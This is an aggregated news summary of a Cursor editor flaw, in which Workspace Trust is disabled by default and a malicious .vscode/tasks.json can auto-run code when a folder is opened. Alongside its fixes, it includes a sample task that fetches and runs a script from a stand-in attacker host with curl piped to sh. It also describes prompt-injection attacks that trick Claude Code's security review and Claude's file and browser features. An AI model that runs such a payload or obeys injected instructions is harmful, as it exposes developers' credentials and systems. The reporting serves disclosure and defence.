2 Sources
[1]
This 'critical' Cursor security flaw could expose your code to malware - how to fix it
A new report has uncovered what it describes as "a critical security vulnerability" in Cursor, the popular AI-powered code-editing platform. The report, published Wednesday by software company Oasis Security, found that code repositories containing a .vscode/tasks.json configuration can instruct Cursor to automatically run certain tasks as soon as the repository is opened. Hackers could exploit that autorun feature via malware embedded in the code.

"This has the potential to leak sensitive credentials, modify files, or serve as a vector for broader system compromise, placing Cursor users at significant risk from supply chain attacks," Oasis wrote.

While Cursor and other AI-powered coding tools like Claude Code and Windsurf have become popular among software developers, the technology is still fraught with bugs. Replit, another AI coding assistant that debuted its newest agent earlier this week, recently deleted a user's entire database.

According to Oasis' report, the problem is rooted in the fact that Cursor's Workspace Trust feature is disabled by default. The feature is intended as a verification step so that Cursor users only run code they know and trust. Without it, the platform will automatically run code found in a repository, leaving the window open for bad actors to surreptitiously slip in malware that could jeopardize a user's system and, from there, potentially spread throughout a broader network.

Running code without Workspace Trust could open "a direct path to unauthorized access with an organization-wide blast radius," Oasis said.

In a statement to Oasis that was published in the report, Cursor said that its platform operates with Workspace Trust deactivated by default because the feature interferes with some of the core automated capabilities that users routinely depend on. "We recommend either enabling Workspace Trust or using a basic text editor when working with suspected malicious repositories," the company said. Cursor also told Oasis that it would soon publish updated security guidelines regarding the Workspace Trust feature.

The fix, then, is simply to enable Workspace Trust. To do so, add the following setting to Cursor's settings file and restart the program: "security.workspace.trust.startupPrompt": "always"

ZDNET has reached out to Cursor for further comment.
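For reference, a minimal sketch of the settings change described above, assuming Cursor honors the same JSON-with-comments user settings file and workspace-trust keys as Visual Studio Code; the security.workspace.trust.enabled line is an assumption added here, since the startup prompt only takes effect once the trust feature itself is switched on:

// settings.json (Cursor/VS Code user settings accept // comments)
{
    // Turn the Workspace Trust feature back on; Cursor ships with it disabled
    "security.workspace.trust.enabled": true,

    // Prompt on every newly opened folder instead of trusting it silently
    "security.workspace.trust.startupPrompt": "always"
}

After saving the change, restart Cursor so the trust prompt applies to any folder opened from that point on.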
[2]
Cursor AI Code Editor Flaw Enables Silent Code Execution via Malicious Repositories
A security weakness has been disclosed in the artificial intelligence (AI)-powered code editor Cursor that could trigger code execution when a maliciously crafted repository is opened in the program. The issue stems from the fact that an out-of-the-box security setting is disabled by default, opening the door for attackers to run arbitrary code on users' computers with their privileges.

"Cursor ships with Workspace Trust disabled by default, so VS Code-style tasks configured with runOptions.runOn: 'folderOpen' auto-execute the moment a developer browses a project," Oasis Security said in an analysis. "A malicious .vscode/tasks.json turns a casual 'open folder' into silent code execution in the user's context."

Cursor is an AI-powered fork of Visual Studio Code, which supports a feature called Workspace Trust to allow developers to safely browse and edit code regardless of where it came from or who wrote it. With this option disabled, an attacker can publish a project on GitHub (or any other platform) that includes a hidden "autorun" instruction telling the IDE to execute a task as soon as a folder is opened, causing malicious code to run when the victim merely browses the booby-trapped repository in Cursor.

"This has the potential to leak sensitive credentials, modify files, or serve as a vector for broader system compromise, placing Cursor users at significant risk from supply chain attacks," Oasis Security researcher Erez Schwartz said.

To counter this threat, users are advised to enable Workspace Trust in Cursor, open untrusted repositories in a different code editor, and audit them before opening them in the tool.

The development comes as prompt injections and jailbreaks have emerged as a stealthy and systemic threat plaguing AI-powered coding and reasoning agents like Claude Code, Cline, K2 Think, and Windsurf, allowing threat actors to embed malicious instructions in sneaky ways to trick the systems into performing malicious actions or leaking data from software development environments.

Software supply chain security outfit Checkmarx, in a report last week, revealed how Anthropic's newly introduced automated security reviews in Claude Code could inadvertently expose projects to security risks, including instructing it to ignore vulnerable code through prompt injections, causing developers to push malicious or insecure code past security reviews.

"In this case, a carefully written comment can convince Claude that even plainly dangerous code is completely safe," the company said. "The end result: a developer - whether malicious or just trying to shut Claude up - can easily trick Claude into thinking a vulnerability is safe."

Another problem is that the AI inspection process also generates and executes test cases, which could lead to a scenario where malicious code is run against production databases if Claude Code isn't properly sandboxed.

The AI company, which also recently launched a new file creation and editing feature in Claude, has warned that the feature carries prompt injection risks due to it running in a "sandboxed computing environment with limited internet access." Specifically, it's possible for a bad actor to "inconspicuously" add instructions via external files or websites (aka indirect prompt injection) that trick the chatbot into downloading and running untrusted code or reading sensitive data from a knowledge source connected via the Model Context Protocol (MCP).
"This means Claude can be tricked into sending information from its context (e.g., prompts, projects, data via MCP, Google integrations) to malicious third parties," Anthropic said. "To mitigate these risks, we recommend you monitor Claude while using the feature and stop it if you see it using or accessing data unexpectedly." That's not all. Late last month, the company also revealed browser-using AI models like Claude for Chrome can face prompt injection attacks, and that it has implemented several defenses to address the threat and reduce the attack success rate of 23.6% to 11.2%. "New forms of prompt injection attacks are also constantly being developed by malicious actors," it added. "By uncovering real-world examples of unsafe behavior and new attack patterns that aren't present in controlled tests, we'll teach our models to recognize the attacks and account for the related behaviors, and ensure that safety classifiers will pick up anything that the model itself misses." At the same time, these tools have also been found susceptible to traditional security vulnerabilities, broadening the attack surface with potential real-world impact - "As AI-driven development accelerates, the most pressing threats are often not exotic AI attacks but failures in classical security controls," Imperva said. "To protect the growing ecosystem of 'vibe coding' platforms, security must be treated as a foundation, not an afterthought."
A significant security vulnerability in the Cursor AI-powered code editor could allow hackers to execute malicious code when users open maliciously crafted repositories. The flaw stems from a default setting that disables a crucial security feature, potentially exposing users to a range of cyber threats.
A significant security flaw has been uncovered in Cursor, the popular AI-powered code-editing platform, potentially exposing users to malware and unauthorized code execution. The vulnerability, described as "critical" by software company Oasis Security, could have far-reaching implications for developers and organizations using the tool [1].
The security issue stems from Cursor's default configuration, which ships with the Workspace Trust feature disabled. This setting allows code repositories containing a specific configuration file (.vscode/tasks.json) to automatically execute certain tasks as soon as they are opened. Hackers could exploit this autorun feature to embed malware into the code, potentially compromising entire systems and networks [1][2].
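To make that autorun mechanism concrete, here is an illustrative sketch of a booby-trapped task file; the task label, URL, and shell command are hypothetical placeholders, while the runOptions.runOn: "folderOpen" key is the standard VS Code tasks mechanism the researchers describe [2]:

// .vscode/tasks.json -- illustrative sketch of the autorun vector
{
    "version": "2.0.0",
    "tasks": [
        {
            // Innocuous-looking label chosen by the attacker (hypothetical)
            "label": "install dependencies",
            "type": "shell",
            // Placeholder payload: fetches and runs an attacker-controlled script
            "command": "curl -s https://attacker.example/payload.sh | sh",
            "runOptions": {
                // Executes the task the moment the folder is opened, with no user action
                "runOn": "folderOpen"
            }
        }
    ]
}

With Workspace Trust disabled, nothing prompts the developer before this task runs; with it enabled, the folder opens in restricted mode and automatic task execution is blocked until the user explicitly trusts the workspace.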
The implications of this vulnerability are severe. Oasis Security warns that it could lead to:

- Leakage of sensitive credentials
- Unauthorized modification of files
- Broader system compromise that spreads across a network
- Supply chain attacks against affected organizations
Erez Schwartz, a researcher at Oasis Security, emphasized the gravity of the situation, stating that this flaw places Cursor users at "significant risk from supply chain attacks" [2].
In a statement to Oasis Security, Cursor acknowledged the issue but explained that the Workspace Trust feature is deactivated by default because it interferes with some core automated features that users routinely depend on. The company recommended either enabling Workspace Trust or using a basic text editor when working with suspected malicious repositories. Cursor also promised to publish updated security guidelines regarding the feature [1].
This incident highlights a growing concern in the rapidly evolving landscape of AI-powered coding tools. While platforms like Cursor, Claude Code, and Windsurf have gained popularity among developers, they are not immune to security vulnerabilities. Recent incidents, such as Replit accidentally deleting a user's entire database, underscore the potential risks associated with these emerging technologies [1].
The Cursor vulnerability is part of a broader trend of security challenges facing AI-powered coding and reasoning agents. Prompt injections and jailbreaks have emerged as stealthy and systemic threats, allowing attackers to embed malicious instructions in subtle ways. These attacks can trick AI systems into performing malicious actions or leaking sensitive data from software development environments [2].
To protect against this vulnerability and similar threats, experts recommend the following [1][2]:

- Enable the Workspace Trust feature in Cursor, as shown in the settings sketch under source [1] above
- Open untrusted repositories in a different code editor first
- Audit unfamiliar repositories, including any .vscode/tasks.json file, before opening them in Cursor
- Monitor AI coding assistants while they run and stop them if they access data unexpectedly
As AI-driven development continues to accelerate, it's crucial for both developers and organizations to prioritize security measures and treat them as foundational elements rather than afterthoughts in their development processes.
Summarized by Navi